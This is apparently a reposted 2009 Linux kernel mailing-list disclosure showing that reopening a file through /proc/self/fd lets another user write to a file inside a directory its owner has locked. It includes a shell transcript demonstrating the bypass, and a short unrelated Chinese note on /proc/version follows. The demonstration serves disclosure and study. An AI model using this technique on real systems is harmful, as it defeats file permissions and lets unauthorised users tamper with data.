/proc filesystem allows bypassing directory permissions on Linux

简介: Hi!This is forward from lkml, so no, I did not invent thishole.

This is forward from lkml, so no, I did not invent this
hole. Unfortunately, I do not think lkml sees this as a security hole,

Jamie Lokier said:
 a) the current permission model under /proc/PID/fd has a security
    hole (which Jamie is worried about)
I believe its bugtraq time. Being able to reopen file with additional
permissions looks like  a security problem...

Jamie, do you have some test script? And do you want your 15 minutes
 of bugtraq fame? ;-).
The reopen does check the inode permission, but it does not require
you have any reachable path to the file.  Someone _might_ use that as
a traditional unix security mechanism, but if so it's probably quite rare.
Ok, I got this, with two users. I guess it is real (but obscure)
security hole.

So, we have this scenario. pavel/root is not doing anything interesting in
the background.

pavel () toy:/tmp$ uname -a
Linux toy.ucw.cz 2.6.32-rc3 #21 Mon Oct 19 07:32:02 CEST 2009 armv5tel GNU/Linux
pavel () toy:/tmp mkdir my_priv; cd my_priv
pavel () toy:/tmp/my_priv$ echo this file should never be writable > unwritable_file
# lock down directory
pavel () toy:/tmp/my_priv$ chmod 700 .
# relax file permissions, directory is private, so this is safe
# check link count on unwritable_file. We would not want someone 
# to have a hard link to work around our permissions, would we?
pavel () toy:/tmp/my_priv$ chmod 666 unwritable_file 
pavel () toy:/tmp/my_priv$ cat unwritable_file 
this file should never be writable
pavel () toy:/tmp/my_priv$ cat unwritable_file 
got you
# Security problem here

[Please pause here for a while before reading how guest did it.]

Unexpected? Well, yes, to me anyway. Linux specific? Yes, I think so.

So what did happen? User guest was able to work around directory
permissions in the background, using /proc filesystem.

guest () toy:~$ bash 3< /tmp/my_priv/unwritable_file 
# Running inside nested shell
guest () toy:~$ read A <&3
guest () toy:~$ echo $A
this file should never be writable

guest () toy:~$ cd /tmp/my_priv
guest () toy:/tmp/my_priv$ ls

# pavel did chmod 000, chmod 666 here
guest () toy:/tmp/my_priv$ ls
ls: cannot open directory .: Permission denied

# Linux correctly prevents guest from writing to that file
guest () toy:/tmp/my_priv$ cat unwritable_file
cat: unwritable_file: Permission denied
guest () toy:/tmp/my_priv$ echo got you >&3
bash: echo: write error: Bad file descriptor

# ...until we take a way around it with /proc filesystem. Oops.
guest () toy:/tmp/my_priv$ echo got you > /proc/self/fd/3 

缓存 监控 Linux
Ubuntu Linux 编译器
`/proc/version`文件在Linux系统中提供当前内核版本详情,属于伪文件系统 `/proc`,展示内核、硬件和进程信息。通过`cat /proc/version`可查看,如`Linux version 5.4.0-80-generic...`,显示内核版本、编译日期等。但此文件不包含发行版信息,查询发行版详情可查看`/etc/os-release`或用`lsb_release`命令。
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